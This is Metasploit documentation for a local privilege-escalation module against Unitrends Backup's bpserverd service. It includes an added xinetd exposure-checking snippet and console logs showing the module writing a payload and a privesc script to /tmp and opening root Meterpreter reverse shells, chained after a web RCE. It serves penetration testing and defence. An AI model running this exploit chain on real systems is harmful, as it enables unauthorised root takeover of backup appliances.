metasploit-framework/documentation/modules/exploit/linux/local/ueb_bpserverd_privesc.md

Vulnerable Application

It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd, has an issue in which its authentication can be bypassed. A remote attacker could use this issue to execute arbitrary commands with root privilege on the target system. This module is very similar to exploit/linux/misc/ueb9_bpserverd, but it runs against localhost by dropping a Python script on the local file system. Unitrends stopped bpserverd from listening remotely in version 10, so on that version only the local path remains.
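Because bpserverd is reached through xinetd, a defender can tell from the service stanza whether it is enabled, which user it runs as, and whether it is reachable beyond loopback (the remote variant described above) or only locally (the path this module takes). The following is an added example, not code from the module or from Unitrends; the stanza contents, the server path and the file name are constructed assumptions.

```python
import re
from typing import Dict, Optional

# Constructed sample of an xinetd service stanza (assumed layout; the real
# file on a UEB appliance may differ). xinetd stanza syntax itself is real.
SAMPLE_XINETD_CONF = """\
service bpserverd
{
    disable     = no
    socket_type = stream
    protocol    = tcp
    wait        = no
    user        = root
    server      = /usr/bp/bin/bpserverd
}
"""

_STANZA_RE = re.compile(r"service\s+(\S+)\s*\{(.*?)\}", re.S)
LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def parse_xinetd(text: str) -> Dict[str, Dict[str, str]]:
    """Parse 'service name { key = value ... }' stanzas into a dict."""
    services: Dict[str, Dict[str, str]] = {}
    for name, body in _STANZA_RE.findall(text):
        attrs: Dict[str, str] = {}
        for line in body.splitlines():
            line = line.split("#", 1)[0].strip()  # drop comments
            if "=" not in line:
                continue
            key, _, value = line.partition("=")
            # tolerate the '+=' / '-=' forms xinetd allows
            attrs[key.strip().rstrip("+-").strip()] = value.strip()
        services[name] = attrs
    return services


def assess_exposure(services: Dict[str, Dict[str, str]],
                    name: str = "bpserverd") -> Optional[str]:
    """Return a finding if the service is enabled and reachable beyond
    loopback; None if absent, disabled, or restricted to loopback."""
    svc = services.get(name)
    if svc is None or svc.get("disable", "no").lower() == "yes":
        return None
    if svc.get("bind", svc.get("interface", "")) in LOOPBACK:
        return None
    only_from = set(svc.get("only_from", "").split())
    if only_from and only_from <= LOOPBACK:
        return None
    return (f"{name} is enabled via xinetd as user {svc.get('user', '?')} "
            f"and is reachable from non-loopback addresses")
```

A None result for an enabled service means only that the remote exposure is closed; the local privilege-escalation path used by this module still applies while the service runs as root.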

This module has been tested successfully on:

  • UEB 9.2
  • UEB 10.0

Verification Steps

  1. Get a user shell with exploit/linux/http/ueb_api_rce (with set target 1)
  2. use exploit/linux/local/ueb_bpserverd_privesc
  3. set session [SESSION]
  4. exploit
  5. A root Meterpreter session should open

Scenarios

UEB 10.0 on CentOS 6.5

msf > use exploit/linux/local/ueb_priv_esc
msf exploit(linux/local/ueb_priv_esc) > set session 4
session => 4
msf exploit(linux/local/ueb_priv_esc) > exploit

[*] Started reverse TCP handler on 15.0.0.177:4444
[*] Writing payload executable to '/tmp/pEFoythF'
[*] Writing privesc script to '/tmp/CTZSovJR'
[*] Fixing permissions
[*] Sending stage (857352 bytes) to 10.20.1.202
[*] Meterpreter session 5 opened (15.0.0.177:4444 -> 10.20.1.202:45188) at 2018-04-27 16:44:28 -0400
[+] Deleted /tmp/pEFoythF
[+] Deleted /tmp/CTZSovJR

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

UEB 9.2 on CentOS 6

resource (ueb_priv.rb)> use exploit/linux/http/ueb_api_rce
resource (ueb_priv.rb)> set rhost 1.1.1.1
rhost => 1.1.1.1
resource (ueb_priv.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (ueb_priv.rb)> set target 1
target => 1
resource (ueb_priv.rb)> run
[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] 1.1.1.1:443 - Sending requests to UEB...
[*] Command Stager progress -  19.76% done (164/830 bytes)
[*] Command Stager progress -  39.16% done (325/830 bytes)
[*] Command Stager progress -  56.87% done (472/830 bytes)
[*] Command Stager progress -  74.82% done (621/830 bytes)
[*] Command Stager progress -  92.77% done (770/830 bytes)
[*] Command Stager progress - 110.48% done (917/830 bytes)
[*] Sending stage (861480 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:40216) at 2018-11-15 20:03:46 -0500
[*] Command Stager progress - 126.63% done (1051/830 bytes)

meterpreter > getuid
Server username: uid=48, gid=48, euid=48, egid=48
meterpreter > sysinfo
Computer     : 1.1.1.1
OS           : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > background
[*] Backgrounding session 1...
resource (ueb_priv.rb)> use exploit/linux/local/ueb_bpserverd_privesc
resource (ueb_priv.rb)> set session 1
session => 1
resource (ueb_priv.rb)> run

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Writing payload executable to '/tmp/.mM0iyQvoAO'
[*] Writing privesc script to '/tmp/.sDjn0m'
[*] Fixing permissions
[*] Sending stage (861480 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:40219) at 2018-11-15 20:04:21 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0